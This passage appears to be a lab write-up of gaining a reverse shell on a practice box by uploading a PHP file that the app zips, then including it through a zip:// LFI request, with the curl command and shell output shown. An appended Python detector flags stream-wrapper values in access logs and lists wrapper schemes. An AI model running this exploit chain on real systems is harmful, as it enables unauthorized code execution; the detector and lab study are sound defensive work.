zip:// with LFI


Given that the target web application explicitly performs its archiving operation using PHP’s ZipArchive class, it is likely that the archive stream wrappers (zip:// and rar://) are enabled in the backend. If that is the case, I can get code execution by uploading a PHP file, having upload.php archive it and save it in the /uploads directory, and then including it via the LFI in the file parameter of index.php using the zip:// wrapper.

I will first upload the payload, shell.php.

The backend successfully archived and saved the payload, shell.php.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zipper]
└─$ curl -s http://$IP/index.php?file=zip://uploads/upload_1743947496.zip%23shell

Invoking the payload via the LFI in the file parameter of index.php with the zip:// wrapper. The .php extension is omitted from the archive member name because index.php appends it.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zipper]
└─$ nnc 9999                                                  
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.229] 47868
SOCKET: Shell has connected! PID: 3784
whoami
www-data
hostname
zipper
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:e7:9a brd ff:ff:ff:ff:ff:ff
    inet 192.168.201.229/24 brd 192.168.201.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account by exploiting the target web application’s archiving logic in combination with the LFI.
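As an added defensive example (not part of the original write-up): the request pattern above is easy to pick out of web-server access logs, because a legitimate value for the file parameter never begins with a PHP stream wrapper. The script below assumes Apache combined-format logs and uses constructed sample lines; it flags any query parameter whose decoded value starts with a wrapper scheme and, for zip:// and rar://, records the archive member named after the #.

```python
import re
from urllib.parse import parse_qsl, unquote

# PHP stream wrappers that have no business in a value handed to include().
# zip:// and rar:// read local files, so allow_url_include=Off does not block them.
WRAPPERS = ("zip://", "rar://", "phar://", "php://", "data://", "glob://",
            "expect://", "compress.zlib://", "compress.bzip2://", "file://",
            "ftp://", "http://", "https://")

# Apache combined-format request line; only the fields the check needs.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_value(value):
    """Return (wrapper, member) if value starts with a stream wrapper, else None.
    member is the archive entry named after '#' for zip:// and rar://."""
    decoded = unquote(value)  # parse_qsl decoded once; decode again for apps that unquote themselves
    lowered = decoded.lower()
    for wrapper in WRAPPERS:
        if lowered.startswith(wrapper):
            member = decoded.partition("#")[2] if wrapper in ("zip://", "rar://") else ""
            return wrapper, member
    return None

def find_wrapper_abuse(lines):
    """Scan access-log lines; one finding per query parameter carrying a wrapper."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split on '?' ourselves so a raw '#' in the query is not dropped as a fragment.
        path, _, query = m.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            hit = classify_value(value)
            if hit:
                findings.append({"ip": m.group("ip"), "path": path, "param": name,
                                 "wrapper": hit[0], "member": hit[1],
                                 "status": m.group("status")})
    return findings

# Constructed sample log lines (not from the original page): the first mirrors the
# request shown above, the second is benign, the third is a URL-encoded rar:// variant.
SAMPLE_LOG = [
    '192.168.45.249 - - [06/Apr/2025:13:52:10 +0000] "GET /index.php?file=zip://uploads/upload_1743947496.zip%23shell HTTP/1.1" 200 512',
    '192.168.45.249 - - [06/Apr/2025:13:52:30 +0000] "GET /index.php?file=about HTTP/1.1" 200 2048',
    '192.168.45.249 - - [06/Apr/2025:13:53:02 +0000] "GET /index.php?file=rar%3A%2F%2Fuploads%2Fupload_1743947496.rar%23shell HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for finding in find_wrapper_abuse(SAMPLE_LOG):
        print(finding)
```

The same check belongs in the application itself: index.php should resolve the file parameter against an allowlist of page names rather than concatenating user input into include(), which closes the wrapper path regardless of which extensions are loaded.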